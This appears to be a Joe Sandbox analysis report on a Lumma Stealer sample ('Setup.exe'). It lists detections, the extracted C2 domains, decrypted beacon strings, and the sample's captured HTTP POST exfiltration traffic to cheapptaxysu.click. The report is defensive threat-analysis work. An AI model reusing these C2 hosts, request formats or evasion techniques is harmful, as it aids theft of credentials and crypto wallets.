Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Setup.exe

Overview

General Information

Sample name:Setup.exe
Analysis ID:1582556
MD5:79d5cc6637e2c1502789c2d7d610916c
SHA1:e8e4f4c2c8edc879da6a157a30215e5c3c0d3562
SHA256:9ddb77296f5248b63b1499b6d78b8707b083518140b789902e037b69260baeb8
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Setup.exe (PID: 7412 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: 79D5CC6637E2C1502789C2D7D610916C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["slipperyloo.lat", "cheapptaxysu.click", "curverpluch.lat", "bashfulacid.lat", "talkynicer.lat", "wordyfindy.lat", "tentabatte.lat", "shapestickyr.lat", "manyrestro.lat"], "Build id": "CZJvss--"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.2043203461.00000000005F0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0x4eb92:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
      • 0x52128:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      00000000.00000003.1994725877.00000000008DB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: Setup.exe PID: 7412JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: Setup.exe PID: 7412JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: Setup.exe PID: 7412JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              Click to see the 1 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-30T21:29:11.331807+010020283713Unknown Traffic192.168.2.449733172.67.177.88443TCP
              2024-12-30T21:29:11.989226+010020283713Unknown Traffic192.168.2.449734172.67.177.88443TCP
              2024-12-30T21:29:13.233334+010020283713Unknown Traffic192.168.2.449737172.67.177.88443TCP
              2024-12-30T21:29:25.673943+010020283713Unknown Traffic192.168.2.449742172.67.177.88443TCP
              2024-12-30T21:29:27.091080+010020283713Unknown Traffic192.168.2.449743172.67.177.88443TCP
              2024-12-30T21:29:29.754507+010020283713Unknown Traffic192.168.2.449744172.67.177.88443TCP
              2024-12-30T21:29:31.157538+010020283713Unknown Traffic192.168.2.449745172.67.177.88443TCP
              2024-12-30T21:29:33.471503+010020283713Unknown Traffic192.168.2.449746172.67.177.88443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-30T21:29:11.495156+010020546531A Network Trojan was detected192.168.2.449733172.67.177.88443TCP
              2024-12-30T21:29:12.457406+010020546531A Network Trojan was detected192.168.2.449734172.67.177.88443TCP
              2024-12-30T21:29:33.992765+010020546531A Network Trojan was detected192.168.2.449746172.67.177.88443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-30T21:29:11.495156+010020498361A Network Trojan was detected192.168.2.449733172.67.177.88443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-30T21:29:12.457406+010020498121A Network Trojan was detected192.168.2.449734172.67.177.88443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-30T21:29:11.331807+010020585411Domain Observed Used for C2 Detected192.168.2.449733172.67.177.88443TCP
              2024-12-30T21:29:11.989226+010020585411Domain Observed Used for C2 Detected192.168.2.449734172.67.177.88443TCP
              2024-12-30T21:29:13.233334+010020585411Domain Observed Used for C2 Detected192.168.2.449737172.67.177.88443TCP
              2024-12-30T21:29:25.673943+010020585411Domain Observed Used for C2 Detected192.168.2.449742172.67.177.88443TCP
              2024-12-30T21:29:27.091080+010020585411Domain Observed Used for C2 Detected192.168.2.449743172.67.177.88443TCP
              2024-12-30T21:29:29.754507+010020585411Domain Observed Used for C2 Detected192.168.2.449744172.67.177.88443TCP
              2024-12-30T21:29:31.157538+010020585411Domain Observed Used for C2 Detected192.168.2.449745172.67.177.88443TCP
              2024-12-30T21:29:33.471503+010020585411Domain Observed Used for C2 Detected192.168.2.449746172.67.177.88443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-30T21:29:10.736491+010020585401Domain Observed Used for C2 Detected192.168.2.4619471.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-30T21:29:26.168677+010020480941Malware Command and Control Activity Detected192.168.2.449742172.67.177.88443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: Setup.exeAvira: detected
              Source: https://cheapptaxysu.click:443/apiAvira URL Cloud: Label: malware
              Source: https://cheapptaxysu.click/apijAvira URL Cloud: Label: malware
              Source: https://cheapptaxysu.click/6Avira URL Cloud: Label: malware
              Source: https://cheapptaxysu.click/apiLAvira URL Cloud: Label: malware
              Source: cheapptaxysu.clickAvira URL Cloud: Label: malware
              Source: https://cheapptaxysu.click/apiOAvira URL Cloud: Label: malware
              Source: https://cheapptaxysu.click/lAvira URL Cloud: Label: malware
              Source: https://cheapptaxysu.click/apiyAvira URL Cloud: Label: malware
              Source: https://cheapptaxysu.click/.?&Avira URL Cloud: Label: malware
              Source: Setup.exe.7412.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["slipperyloo.lat", "cheapptaxysu.click", "curverpluch.lat", "bashfulacid.lat", "talkynicer.lat", "wordyfindy.lat", "tentabatte.lat", "shapestickyr.lat", "manyrestro.lat"], "Build id": "CZJvss--"}
              Source: Setup.exeReversingLabs: Detection: 52%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.7% probability
              Source: Setup.exeJoe Sandbox ML: detected
              Source: 00000000.00000002.2043203461.00000000005F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: bashfulacid.lat
              Source: 00000000.00000002.2043203461.00000000005F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: tentabatte.lat
              Source: 00000000.00000002.2043203461.00000000005F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: curverpluch.lat
              Source: 00000000.00000002.2043203461.00000000005F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: talkynicer.lat
              Source: 00000000.00000002.2043203461.00000000005F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: shapestickyr.lat
              Source: 00000000.00000002.2043203461.00000000005F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: manyrestro.lat
              Source: 00000000.00000002.2043203461.00000000005F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: slipperyloo.lat
              Source: 00000000.00000002.2043203461.00000000005F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: wordyfindy.lat
              Source: 00000000.00000002.2043203461.00000000005F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: cheapptaxysu.click
              Source: 00000000.00000002.2043203461.00000000005F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.2043203461.00000000005F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.2043203461.00000000005F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.2043203461.00000000005F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.2043203461.00000000005F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.2043203461.00000000005F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: CZJvss--
              Source: Setup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49745 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49746 version: TLS 1.2

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2058541 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cheapptaxysu .click in TLS SNI) : 192.168.2.4:49734 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2058541 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cheapptaxysu .click in TLS SNI) : 192.168.2.4:49733 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2058540 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cheapptaxysu .click) : 192.168.2.4:61947 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058541 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cheapptaxysu .click in TLS SNI) : 192.168.2.4:49745 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2058541 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cheapptaxysu .click in TLS SNI) : 192.168.2.4:49746 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2058541 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cheapptaxysu .click in TLS SNI) : 192.168.2.4:49742 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2058541 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cheapptaxysu .click in TLS SNI) : 192.168.2.4:49737 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2058541 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cheapptaxysu .click in TLS SNI) : 192.168.2.4:49743 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2058541 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cheapptaxysu .click in TLS SNI) : 192.168.2.4:49744 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49734 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49734 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49742 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49733 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49746 -> 172.67.177.88:443
              Source: Malware configuration extractorURLs: slipperyloo.lat
              Source: Malware configuration extractorURLs: cheapptaxysu.click
              Source: Malware configuration extractorURLs: curverpluch.lat
              Source: Malware configuration extractorURLs: bashfulacid.lat
              Source: Malware configuration extractorURLs: talkynicer.lat
              Source: Malware configuration extractorURLs: wordyfindy.lat
              Source: Malware configuration extractorURLs: tentabatte.lat
              Source: Malware configuration extractorURLs: shapestickyr.lat
              Source: Malware configuration extractorURLs: manyrestro.lat
              Source: Joe Sandbox ViewIP Address: 172.67.177.88 172.67.177.88
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 172.67.177.88:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 172.67.177.88:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cheapptaxysu.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=4ES7po80595fIjJPhQxgt5vlBy1.qekvq8p3kvm4hDY-1735590551-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: cheapptaxysu.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KMFSF0FIQR07XEC7DECookie: __cf_mw_byp=4ES7po80595fIjJPhQxgt5vlBy1.qekvq8p3kvm4hDY-1735590551-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: cheapptaxysu.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=C4WY7CSX22Cookie: __cf_mw_byp=4ES7po80595fIjJPhQxgt5vlBy1.qekvq8p3kvm4hDY-1735590551-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8731Host: cheapptaxysu.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=648SJEUVLL7PBB71KXJCookie: __cf_mw_byp=4ES7po80595fIjJPhQxgt5vlBy1.qekvq8p3kvm4hDY-1735590551-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20438Host: cheapptaxysu.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=S8VNT2VMZNYLV0PCookie: __cf_mw_byp=4ES7po80595fIjJPhQxgt5vlBy1.qekvq8p3kvm4hDY-1735590551-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1232Host: cheapptaxysu.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7LP70VPPUCookie: __cf_mw_byp=4ES7po80595fIjJPhQxgt5vlBy1.qekvq8p3kvm4hDY-1735590551-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570584Host: cheapptaxysu.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=4ES7po80595fIjJPhQxgt5vlBy1.qekvq8p3kvm4hDY-1735590551-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: cheapptaxysu.click
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: cheapptaxysu.click
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cheapptaxysu.click
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 30 Dec 2024 20:29:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O7mdCnRvVYl8IN6BUPlNSXcLV%2FNvReq9rg8R5MyQG2BziQgtO%2Bx%2BEGM%2B2DrkvXM0dRhTKzSzo1KWPPAHzvgxsxZjZxZRdXScE5Zj5ZCsZzQlZF0sBCQSULFoQDXvnl3wZLCUcUM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fa4c7d278ff0f64-EWR
              Source: Setup.exe, 00000000.00000003.1965135425.0000000003131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: Setup.exe, 00000000.00000003.1965135425.0000000003131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: Setup.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: Setup.exe, 00000000.00000003.1817406294.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2005455140.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2043435488.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2042790488.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1994725877.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2042599005.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1827827492.00000000008DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: Setup.exe, 00000000.00000003.1817406294.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1827827492.00000000008DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m&Ja
              Source: Setup.exe, 00000000.00000003.1965135425.0000000003131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: Setup.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
              Source: Setup.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: Setup.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
              Source: Setup.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
              Source: Setup.exe, 00000000.00000003.1965135425.0000000003131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: Setup.exe, 00000000.00000003.1965135425.0000000003131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: Setup.exe, 00000000.00000003.1965135425.0000000003131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: Setup.exe, 00000000.00000003.1965135425.0000000003131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: Setup.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
              Source: Setup.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
              Source: Setup.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
              Source: Setup.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
              Source: Setup.exeString found in binary or memory: http://ocsp.comodoca.com0
              Source: Setup.exe, 00000000.00000003.1965135425.0000000003131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: Setup.exe, 00000000.00000003.1965135425.0000000003131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: Setup.exeString found in binary or memory: http://ocsp.sectigo.com0
              Source: Setup.exeString found in binary or memory: http://ocsp.sectigo.com0&
              Source: Setup.exeString found in binary or memory: http://wittsoft.blogspot.com
              Source: Setup.exe, 00000000.00000003.1965135425.0000000003131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: Setup.exe, 00000000.00000003.1965135425.0000000003131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: Setup.exe, 00000000.00000003.1829084206.0000000003148000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1828936723.000000000314B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: Setup.exe, 00000000.00000003.1968388983.0000000003114000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
              Source: Setup.exe, 00000000.00000003.1968388983.0000000003114000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
              Source: Setup.exe, 00000000.00000003.1829084206.0000000003148000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1828936723.000000000314B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: Setup.exe, 00000000.00000003.1829084206.0000000003148000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1828936723.000000000314B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: Setup.exe, 00000000.00000003.1829084206.0000000003148000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1828936723.000000000314B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: Setup.exe, 00000000.00000002.2043317533.0000000000889000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2042599005.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2042599005.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2043397401.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1827827492.00000000008DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/
              Source: Setup.exe, 00000000.00000003.2005455140.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2043435488.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2042790488.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1994725877.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2042599005.00000000008DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/.?&
              Source: Setup.exe, 00000000.00000003.2005455140.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1994725877.00000000008DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/6
              Source: Setup.exe, 00000000.00000003.2042790488.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1994725877.00000000008B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/api
              Source: Setup.exe, 00000000.00000003.2005455140.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2043435488.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2042790488.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2042599005.00000000008DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/apiL
              Source: Setup.exe, 00000000.00000003.1994725877.00000000008B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/apiO
              Source: Setup.exe, 00000000.00000003.1827827492.00000000008DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/apij
              Source: Setup.exe, 00000000.00000002.2043435488.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2042790488.00000000008B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/apiy
              Source: Setup.exe, 00000000.00000002.2043317533.0000000000889000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/l
